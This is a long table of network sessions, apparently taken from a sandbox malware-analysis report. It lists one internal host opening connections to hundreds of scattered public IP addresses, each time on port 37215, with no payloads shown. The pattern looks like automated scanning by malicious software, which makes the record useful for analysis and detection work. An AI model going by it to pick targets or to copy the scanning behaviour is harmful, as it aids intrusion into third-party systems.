                                                  7267192.168.2.1336382197.85.135.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7268192.168.2.1343404157.215.173.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7269192.168.2.1353292157.238.106.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7270192.168.2.135864241.38.176.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7271192.168.2.1350968197.64.204.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7272192.168.2.133328881.240.156.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7273192.168.2.1335408121.183.181.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7274192.168.2.1349352197.17.183.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7275192.168.2.1338150151.75.235.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7276192.168.2.134796241.195.2.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7277192.168.2.135266841.147.245.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7278192.168.2.1339808157.207.44.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7279192.168.2.1355394197.69.167.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7280192.168.2.1341378157.47.36.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7281192.168.2.1359776157.64.230.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7282192.168.2.1357272197.77.102.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7283192.168.2.1340522157.141.128.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7284192.168.2.1356544168.228.141.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7285192.168.2.1337814140.57.249.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7286192.168.2.1357232177.5.243.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7287192.168.2.1351552157.186.140.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7288192.168.2.1346234197.93.3.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7289192.168.2.1339738117.77.3.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7290192.168.2.133464241.247.53.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7291192.168.2.1348386119.3.113.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7292192.168.2.135934013.168.89.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7293192.168.2.133609241.66.59.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7294192.168.2.1346646157.88.34.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7295192.168.2.1333814197.238.230.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7296192.168.2.1354828197.207.31.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7297192.168.2.1356802157.75.148.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7298192.168.2.133553063.227.118.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7299192.168.2.133513841.231.249.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7300192.168.2.1341122157.11.211.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7301192.168.2.1357348197.224.194.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7302192.168.2.134313841.177.223.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7303192.168.2.133508041.145.254.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7304192.168.2.1344110157.148.163.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7305192.168.2.1349710167.241.104.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7306192.168.2.1343630197.159.73.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7307192.168.2.133502041.82.153.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7308192.168.2.135910241.58.196.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7309192.168.2.1354610197.135.169.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7310192.168.2.1337678157.12.143.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7311192.168.2.1336806157.120.68.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7312192.168.2.134601841.143.232.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7313192.168.2.1337096101.127.111.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7314192.168.2.1354884157.6.169.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7315192.168.2.135508241.198.38.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7316192.168.2.1359626197.125.190.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7317192.168.2.1345234173.185.157.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7318192.168.2.134743841.94.138.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7319192.168.2.1345274197.42.79.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7320192.168.2.1339856197.176.145.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7321192.168.2.134689041.60.67.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7322192.168.2.1356350197.129.65.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7323192.168.2.135533241.132.163.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7324192.168.2.133617641.247.90.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7325192.168.2.1345002157.213.104.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7326192.168.2.1359482150.127.212.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7327192.168.2.13370189.49.206.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7328192.168.2.135782232.237.87.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7329192.168.2.1339986197.155.237.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7330192.168.2.1333414197.21.42.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7331192.168.2.1346702157.169.52.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7332192.168.2.1338212180.152.6.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7333192.168.2.1349252157.95.177.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7334192.168.2.135730241.186.44.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7335192.168.2.1334036157.180.5.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7336192.168.2.1336726157.238.248.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7337192.168.2.134842241.65.93.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7338192.168.2.1359146157.42.243.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7339192.168.2.1355210197.5.36.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7340192.168.2.1337138157.198.36.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7341192.168.2.134149441.14.24.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7342192.168.2.135649641.128.140.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7343192.168.2.1336114197.159.197.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7344192.168.2.135676838.189.39.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7345192.168.2.1338372197.128.193.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7346192.168.2.1332810126.131.30.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7347192.168.2.1359770196.226.192.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7348192.168.2.134124884.164.148.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7349192.168.2.1351208185.27.183.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7350192.168.2.135529241.149.6.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7351192.168.2.134511841.23.98.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7352192.168.2.133383041.127.215.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7353192.168.2.133983641.161.189.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7354192.168.2.1358818197.32.24.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7355192.168.2.1354078197.170.40.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7356192.168.2.1353796157.83.122.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7357192.168.2.1340030197.155.74.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7358192.168.2.133329441.103.83.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7359192.168.2.1351540197.172.85.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7360192.168.2.1354552146.192.94.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7361192.168.2.1345308197.196.65.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7362192.168.2.1358792197.212.222.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7363192.168.2.1358030157.249.137.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7364192.168.2.1354694197.29.163.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7365192.168.2.133968041.213.73.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7366192.168.2.1337914197.191.237.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7367192.168.2.1336980157.90.105.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7368192.168.2.1358224157.45.204.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7369192.168.2.1334314197.91.34.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7370192.168.2.1333978197.3.9.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7371192.168.2.1334378157.77.42.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7372192.168.2.1354990197.41.17.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7373192.168.2.1353822151.63.252.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7374192.168.2.1358826197.3.43.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7375192.168.2.133790241.243.233.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7376192.168.2.1359396157.128.245.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7377192.168.2.1338850124.7.132.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7378192.168.2.1346528157.66.1.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7379192.168.2.1358250157.139.39.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7380192.168.2.134465441.47.211.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7381192.168.2.1350324195.215.213.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7382192.168.2.1360572157.196.230.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7383192.168.2.1355052210.89.204.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7384192.168.2.133477213.250.169.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7385192.168.2.1344754128.217.2.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7386192.168.2.1336422156.143.113.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7387192.168.2.1353790178.249.151.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7388192.168.2.135746641.231.246.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7389192.168.2.1342414157.51.84.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7390192.168.2.1346130160.30.111.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7391192.168.2.1343920197.5.94.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7392192.168.2.134553641.218.89.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7393192.168.2.134513482.226.170.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7394192.168.2.1332832197.132.193.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7395192.168.2.1354026157.54.7.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7396192.168.2.133573880.212.128.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7397192.168.2.1359528157.95.160.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7398192.168.2.1353172197.77.104.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7399192.168.2.134132841.5.68.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7400192.168.2.1341176157.148.66.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7401192.168.2.1344040157.118.183.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7402192.168.2.1348154157.48.14.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7403192.168.2.135826041.18.1.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7404192.168.2.1349690157.36.237.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7405192.168.2.1335158167.72.145.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7406192.168.2.1356754197.116.224.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7407192.168.2.134233641.68.13.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7408192.168.2.1350800157.145.209.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7409192.168.2.1334154197.6.118.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7410192.168.2.135436641.198.165.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7411192.168.2.1334832158.60.155.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7412192.168.2.1332828197.107.86.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7413192.168.2.1353928197.156.172.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7414192.168.2.1343486120.32.209.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7415192.168.2.1337856174.23.171.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7416192.168.2.1346566162.197.1.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7417192.168.2.1336572197.170.121.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7418192.168.2.134089241.133.104.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7419192.168.2.1343998157.121.42.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7420192.168.2.134298041.182.67.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7421192.168.2.134981041.120.132.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7422192.168.2.13551621.35.249.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7423192.168.2.135908041.194.21.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7424192.168.2.1351814197.142.240.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7425192.168.2.1350874197.150.200.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7426192.168.2.1354672124.216.69.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7427192.168.2.1336318157.216.138.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7428192.168.2.134956241.33.59.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7429192.168.2.1341854157.65.125.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7430192.168.2.1344440163.117.125.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7431192.168.2.1350066157.70.78.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7432192.168.2.1352300181.227.96.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7433192.168.2.1348268197.34.108.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7434192.168.2.1349528197.246.9.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7435192.168.2.1336868157.33.241.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7436192.168.2.133893641.18.40.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7437192.168.2.1345796197.167.116.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7438192.168.2.134931038.28.150.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7439192.168.2.1333006124.198.12.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7440192.168.2.1337576197.178.67.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7441192.168.2.135799841.73.84.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7442192.168.2.135734641.94.182.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7443192.168.2.135010641.186.213.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7444192.168.2.1333172197.109.73.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7445192.168.2.1352986157.135.20.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7446192.168.2.1346928197.70.254.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7447192.168.2.133933676.109.227.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7448192.168.2.1337050154.103.21.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7449192.168.2.1357752203.108.172.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7450192.168.2.1357524197.73.15.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7451192.168.2.1348692157.137.24.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7452192.168.2.135310241.53.4.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7453192.168.2.135925241.157.82.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7454192.168.2.1359588197.190.139.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7455192.168.2.1357580153.166.208.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7456192.168.2.1348960157.99.11.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7457192.168.2.1357052157.93.46.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7458192.168.2.133370241.101.147.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7459192.168.2.1356930197.103.153.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7460192.168.2.133699841.23.37.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7461192.168.2.134830641.8.200.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7462192.168.2.135205441.223.150.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7463192.168.2.135519641.94.111.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7464192.168.2.134728023.59.5.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7465192.168.2.1349052197.74.116.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7466192.168.2.1335310197.116.116.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7467192.168.2.1360108197.57.178.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7468192.168.2.1357850105.27.153.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7469192.168.2.1336034197.16.160.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7470192.168.2.1353350197.121.14.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7471192.168.2.135382041.63.10.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7472192.168.2.1357680203.204.250.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7473192.168.2.135258641.152.7.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7474192.168.2.1358728157.124.157.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7475192.168.2.1343292197.218.24.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7476192.168.2.1344202157.108.223.7537215
